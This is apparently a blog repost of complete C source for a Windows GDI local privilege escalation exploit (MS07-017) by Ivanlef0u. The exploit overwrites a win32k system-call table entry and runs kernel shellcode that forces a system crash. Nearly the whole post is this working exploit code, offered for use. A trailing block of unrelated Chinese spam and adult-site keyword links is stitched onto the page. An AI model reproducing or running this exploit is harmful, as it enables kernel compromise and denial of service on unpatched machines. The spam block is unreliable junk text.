• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            elva

            MS Windows GDI Local Privilege Escalation Exploit (MS07-017)

            #define _WIN32_WINNT 0x0500
            #include <windows.h>
            #include <shlwapi.h>
            #include <stdio.h>

            #pragma comment (lib, "user32.lib")
            #pragma comment (lib, "gdi32.lib")
            #pragma comment (lib, "shlwapi.lib")
            #pragma comment (lib, "ntdll.lib")



            /*
            Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
            by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the
            win32k's SSDT by 0x2.

            before :
            lkd> dps bf998300 L 2
            bf998300  bf934921 win32k!NtGdiAbortDoc
            bf998304  bf94648d win32k!NtGdiAbortPath

            after :
            lkd> dps bf998300 L 2
            bf998300  00000002
            bf998304  bf94648d win32k!NtGdiAbortPath

            win32k.sys bDeleteBrush (called by DeleteObject)
            mov     esi, [edx] ;esi=pKernelInfo
            cmp     [esi+4], ebx ; ebx=0, we need [esi+4]>0
            mov     eax, [edx+0Ch]
            mov     [ebp+var_8], eax
            ja      short loc_BF80C1E7 ;jump if [esi+4] > 0

            loc_BF80C1E7:
            mov     eax, [esi+24h]  ; [esi+24] = addr to hijack (here win32k SSDT)
            mov     dword ptr [eax], 2 ; !!!!!

            At 0x2 we allocate memory with NtAllocateVirtualMemory and we copy our payload.

            Tested on windows xp sp2 french last updates (before MS07-017)

            Coded by Ivanlef0u.
            http://ivanlef0u.free.fr

            ref:
            http://www.Mcft.com/technet/security/bulletin/MS07-017.mspx
            http://research.eeye.com/html/alerts/zeroday/20061106.html
            http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
            https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf
            http://www.securityfocus.com/bid/20940/info
            */

            typedef struct
            {
               DWORD pKernelInfo;
               WORD  ProcessID;
               WORD  _nCount;
               WORD  nUpper;
               WORD  nType;
               DWORD pUserInfo;
            } GDITableEntry;

            typedef enum _SECTION_INFORMATION_CLASS {
            SectionBasicInformation,
            SectionImageInformation
            }SECTION_INFORMATION_CLASS;

            typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0
            PVOID BaseAddress;
            ULONG Attributes;
            LARGE_INTEGER Size;
            }SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;

            extern "C" ULONG __stdcall NtQuerySection(
               IN HANDLE SectionHandle,
               IN SECTION_INFORMATION_CLASS SectionInformationClass,
               OUT PVOID SectionInformation,
               IN ULONG SectionInformationLength,
               OUT PULONG ResultLength OPTIONAL
            );

            extern "C" ULONG __stdcall NtAllocateVirtualMemory(
               IN HANDLE ProcessHandle,
               IN OUT PVOID *BaseAddress,
               IN ULONG ZeroBits,
               IN OUT PULONG AllocationSize,
               IN ULONG AllocationType,
               IN ULONG Protect
            );

            typedef LONG NTSTATUS;

            #define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)
            #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

            typedef struct _UNICODE_STRING {
            USHORT Length;
            USHORT MaximumLength;
            PWSTR Buffer;
            } UNICODE_STRING, *PUNICODE_STRING;

            typedef enum _SYSTEM_INFORMATION_CLASS {
            SystemModuleInformation=11,
            } SYSTEM_INFORMATION_CLASS;

            typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
            ULONG Reserved[2];
            PVOID Base;
            ULONG Size;
            ULONG Flags;
            USHORT Index;
            USHORT Unknown;
            USHORT LoadCount;
            USHORT ModuleNameOffset;
            CHAR ImageName[256];
            } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

            extern "C" NTSTATUS __stdcall  NtQuerySystemInformation(         
               IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
               IN OUT PVOID SystemInformation,
               IN ULONG SystemInformationLength,
               OUT PULONG ReturnLength OPTIONAL
            );

            extern "C" ULONG __stdcall RtlNtStatusToDosError(
              NTSTATUS Status
            );


            // generic kernel payload, reboot the b0x
            unsigned char Shellcode[]={
            0x60, //PUSHAD
            0x55, //PUSH EBP

            0x6A, 0x34,
            0x5B,
            0x64, 0x8B, 0x1B,
            0x8B, 0x6B, 0x10,

            0x8B, 0x45, 0x3C,
            0x8B, 0x54, 0x05, 0x78,
            0x03, 0xD5,
            0x8B, 0x5A, 0x20,
            0x03, 0xDD,
            0x8B, 0x4A, 0x18,
            0x49,
            0x8B, 0x34, 0x8B,
            0x03, 0xF5,
            0x33, 0xFF,
            0x33, 0xC0,
            0xFC,
            0xAC,
            0x84, 0xC0,
            0x74, 0x07,
            0xC1, 0xCF, 0x0D,
            0x03, 0xF8,
            0xEB, 0xF4,
            0x81, 0xFF, 0x1f, 0xaa ,0xf2 ,0xb9, //0xb9f2aa1f, KEBugCheck
            0x75, 0xE1,
            0x8B, 0x42, 0x24,
            0x03, 0xC5,
            0x66, 0x8B, 0x0C, 0x48,
            0x8B, 0x42, 0x1C,
            0x03, 0xC5,
            0x8B, 0x04 ,0x88,
            0x03, 0xC5,

            0x33, 0xDB,
            0xB3, 0xE5,
            0x53,
            0xFF, 0xD0,

            0x5D, //POP EBP
            0x61, //POPAD
            0xC3 //RET
            };   


            ULONG GetWin32kBase()
            {
               ULONG i, Count, Status, BytesRet;
               PSYSTEM_MODULE_INFORMATION pSMI;
               
               Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, 0, &BytesRet); //allocation length
               if(Status!=STATUS_INFO_LENGTH_MISMATCH)
                  printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
               
               pSMI=(PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BytesRet);
               
               Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, BytesRet, &BytesRet);
               
               if(Status!=STATUS_SUCCESS)
                  printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
               
               /*
               The data returned to the SystemInformation buffer is a ULONG count of the number of
               handles followed immediately by an array of
               SYSTEM_MODULE_INFORMATION.
               */
               
               Count=*(PULONG)pSMI;
               pSMI=(PSYSTEM_MODULE_INFORMATION)((PUCHAR)pSMI+4);
               
               for(i=0; i<Count; i++)
               {   
                  if(StrStr((pSMI+i)->ImageName, "win32k.sys"))
                     return (ULONG)(pSMI+i)->Base;
               }
               
               HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, pSMI);
               
               return 0;   
            }   



               
            ULONG buff[500]={0};
               
            int main(int argc, char* argv[])
            {
               ULONG i, PID, Status, Old;
               LPVOID lpMapAddress=NULL;
               HANDLE hMapFile=(HANDLE)0x10;
               GDITableEntry *gdiTable;
               SECTION_BASIC_INFORMATION SBI;
               WORD Upr;
               ULONG Size=0x1000;
               PVOID Addr=(PVOID)0x2;
               
               printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n"
               "http://ivanlef0u.free.fr\n"
               "Be MAD!\n");
               
               //allocate memory at addresse 0x2
                Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
                if(Status)
                   printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status);
                else
                   printf("Addr : 0x%x OKAY\n", Addr);   
               
               memcpy(Addr, Shellcode, sizeof(Shellcode));
               


                printf("win32.sys base : 0x%x\n", GetWin32kBase());
               
               ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT
               printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc
               
               
               
               HBRUSH hBr;
               hBr=CreateSolidBrush(0);

               Upr=(WORD)((DWORD)hBr>>16);
               printf("0x%x\n", Upr);

               while(!lpMapAddress)
               {
                  hMapFile=(HANDLE)((ULONG)hMapFile+1);
                  lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
               }

               if(lpMapAddress==NULL)
               {
                  printf("Error with MapViewOfFile : %d\n", GetLastError());
                  return 0;
               }

               Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0);
               if (Status) //!=STATUS_SUCCESS (0)
               {
                  printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status);
                  return 0;
               }

               printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart);
               gdiTable=(GDITableEntry *)lpMapAddress;
               PID=GetCurrentProcessId();
               
               for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry))
               {
                  if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush
                  {   

                     printf("gdiTable : 0x%x\n", gdiTable);
                     printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo);
                     printf("ProcessID : %d\n", gdiTable->ProcessID);
                     printf("_nCount : %d\n", gdiTable->_nCount);
                     printf("nUpper : 0x%x\n", gdiTable->nUpper);
                     printf("nType : 0x%x\n", gdiTable->nType );
                     printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo);
                     
                     Old=gdiTable->pKernelInfo;
                  
                     gdiTable->pKernelInfo=(ULONG)buff; //crafted buff
                     break;
                  }
                  gdiTable++;
               }

               if(!DeleteObject(hBr))
                  printf("Error with DeleteObject : %d\n", GetLastError());
               else
                  printf("Done\n");

               printf("Buff : 0x%x\n", buff);
               memset(buff, 0x90, sizeof(buff));
               
                buff[0]=0x1; //!=0
                buff[0x24/4]=Win32kSST; //syscall to modifY
               buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr

                if(!DeleteObject(hBr))
                  printf("Error with DeleteObject : %d\n", GetLastError());   
                  
               gdiTable->pKernelInfo=Old; //restore old value
               
               /*   
               lkd> uf GDI32!NtGdiAbortDoc
               GDI32!NtGdiAbortDoc:
               77f3073a b800100000      mov     eax,1000h
               77f3073f ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
               77f30744 ff12            call    dword ptr [edx]
               77f30746 c20400          ret     4
               */

               __asm
               {
                  mov eax, 0x1000
                  mov edx,0x7ffe0300
                  call dword ptr [edx]   
               }
               
               return 0;
            }

            download

            posted on 2007-05-08 16:49 葉子 閱讀(783) 評論(0)  編輯 收藏 引用 所屬分類: 網(wǎng)絡(luò)安全

            99久久www免费人成精品| 77777亚洲午夜久久多喷| 精品无码久久久久久国产| 青青草原综合久久| 久久久WWW成人免费毛片| 欧美精品九九99久久在观看| 久久受www免费人成_看片中文| 伊人色综合久久天天人手人婷 | 蜜臀av性久久久久蜜臀aⅴ麻豆| 亚洲国产精品无码久久一区二区 | 久久夜色精品国产欧美乱| 精品久久久噜噜噜久久久| 久久99精品久久久久久噜噜| 精品久久久中文字幕人妻| 亚洲国产精久久久久久久| 久久久久久久精品妇女99| 国产精品久久久久久久久免费| 无码人妻少妇久久中文字幕| 精品人妻久久久久久888| 亚洲?V乱码久久精品蜜桃| 99久久婷婷免费国产综合精品| 精品国产日韩久久亚洲| 亚洲一区中文字幕久久| 77777亚洲午夜久久多喷| 久久久精品波多野结衣| 97久久国产亚洲精品超碰热| 亚洲人AV永久一区二区三区久久| 久久久久人妻一区精品色| 久久久久av无码免费网| 欧美久久天天综合香蕉伊| 国产精品激情综合久久| 久久精品国产免费| 精品久久久久久无码专区| 国产一区二区久久久| 亚洲乱码日产精品a级毛片久久| 亚洲综合精品香蕉久久网97| 久久久精品国产sm调教网站| 一本色道久久88精品综合| 久久妇女高潮几次MBA| 国内高清久久久久久| 亚洲国产精品无码久久久不卡 |